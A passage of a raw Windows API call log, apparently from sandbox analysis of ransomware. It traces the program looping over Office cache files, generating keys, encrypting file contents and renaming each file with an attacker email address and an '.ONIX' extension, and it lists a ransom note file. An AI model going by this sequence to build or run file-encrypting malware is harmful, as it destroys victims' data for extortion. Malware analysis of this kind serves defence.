Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" [0101.273] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0101.273] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=17456632) returned 1 [0101.273] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10a5df8 [0101.273] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0101.273] GetProcessHeap () returned 0x410000 [0101.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0101.273] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0101.274] WriteFile (in: hFile=0x394, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0101.276] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0101.278] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0101.279] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a5df8) returned 0x3680020 [0101.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a5df8) returned 0x4730020 [0101.280] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.280] ReadFile (in: hFile=0x394, lpBuffer=0x3680020, nNumberOfBytesToRead=0x10a5df8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x10a5df8, lpOverlapped=0x0) returned 1 [0102.256] UnlockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10a5df8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0102.256] CloseHandle (hObject=0x394) returned 1 [0102.264] GetProcessHeap () returned 0x410000 [0102.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0102.264] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0102.267] GetProcessHeap () returned 0x410000 [0102.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0102.267] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0102.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0102.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0102.268] FindNextFileW (in: hFindFile=0x48eb30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0102.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0102.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0102.268] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.268] GetLastError () returned 0x0 [0102.268] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x394 [0102.269] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.269] LockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7c4, nNumberOfBytesToLockHigh=0x0) returned 1 [0102.269] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.269] ReadFile (in: hFile=0x394, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0102.271] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.271] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.271] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0102.271] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0102.271] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0102.272] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0102.272] GetProcessHeap () returned 0x410000 [0102.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0102.272] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" [0102.272] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0102.272] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1988) returned 1 [0102.272] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7c4 [0102.272] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0102.272] GetProcessHeap () returned 0x410000 [0102.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0102.272] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0102.272] WriteFile (in: hFile=0x394, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0102.274] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0102.275] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0102.276] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7c4) returned 0x4d6b68 [0102.276] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7c4) returned 0x4d7338 [0102.276] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.276] ReadFile (in: hFile=0x394, lpBuffer=0x4d6b68, nNumberOfBytesToRead=0x7c4, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b68*, lpNumberOfBytesRead=0x367f44c*=0x7c4, lpOverlapped=0x0) returned 1 [0102.276] SetFilePointer (in: hFile=0x394, lDistanceToMove=-1988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.276] WriteFile (in: hFile=0x394, lpBuffer=0x4d7338*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d7338*, lpNumberOfBytesWritten=0x367f44c*=0x7c4, lpOverlapped=0x0) returned 1 [0102.277] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b68 | out: hHeap=0x410000) returned 1 [0102.277] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d7338 | out: hHeap=0x410000) returned 1 [0102.277] UnlockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7c4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0102.277] CloseHandle (hObject=0x394) returned 1 [0102.279] GetProcessHeap () returned 0x410000 [0102.279] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0102.279] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0102.281] GetProcessHeap () returned 0x410000 [0102.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0102.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0102.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0102.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0102.281] FindNextFileW (in: hFindFile=0x48eb30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c1c230, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0102.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.281] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.281] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0102.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.282] GetLastError () returned 0x0 [0102.282] FindNextFileW (in: hFindFile=0x48eb30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c1c230, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0102.282] CloseHandle (hObject=0x3cc) returned 1 [0102.282] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.282] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x29, wMilliseconds=0x297)) [0102.282] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0102.282] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0102.283] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0102.283] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0102.283] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0102.283] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.283] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.284] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x449d98 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4587d0 | out: hHeap=0x410000) returned 1 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f658 | out: hHeap=0x410000) returned 1 [0102.284] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48eb70 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.284] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.284] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.284] GetLastError () returned 0x0 [0102.284] FindNextFileW (in: hFindFile=0x48eb70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.284] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.284] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.284] GetLastError () returned 0x0 [0102.284] FindNextFileW (in: hFindFile=0x48eb70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.284] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.284] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0102.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.284] GetLastError () returned 0x0 [0102.284] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x1fc [0102.285] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.285] LockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x265400, nNumberOfBytesToLockHigh=0x0) returned 1 [0102.285] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.285] ReadFile (in: hFile=0x1fc, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0102.287] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.287] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.287] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0102.287] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0102.287] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", dwFileAttributes=0x80) returned 1 [0102.288] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 78 [0102.288] GetProcessHeap () returned 0x410000 [0102.288] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0102.288] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" [0102.288] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0102.288] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2511872) returned 1 [0102.288] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x265400 [0102.288] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0102.288] GetProcessHeap () returned 0x410000 [0102.288] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0102.288] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0102.288] WriteFile (in: hFile=0x1fc, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0102.290] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0102.291] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0102.292] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x265400) returned 0x3680020 [0102.292] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x265400) returned 0x38f0020 [0102.293] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.293] ReadFile (in: hFile=0x1fc, lpBuffer=0x3680020, nNumberOfBytesToRead=0x265400, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x265400, lpOverlapped=0x0) returned 1 [0102.418] UnlockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x265400, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0102.418] CloseHandle (hObject=0x1fc) returned 1 [0102.420] GetProcessHeap () returned 0x410000 [0102.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0102.420] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0102.422] GetProcessHeap () returned 0x410000 [0102.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0102.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0102.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0102.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0102.422] FindNextFileW (in: hFindFile=0x48eb70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, 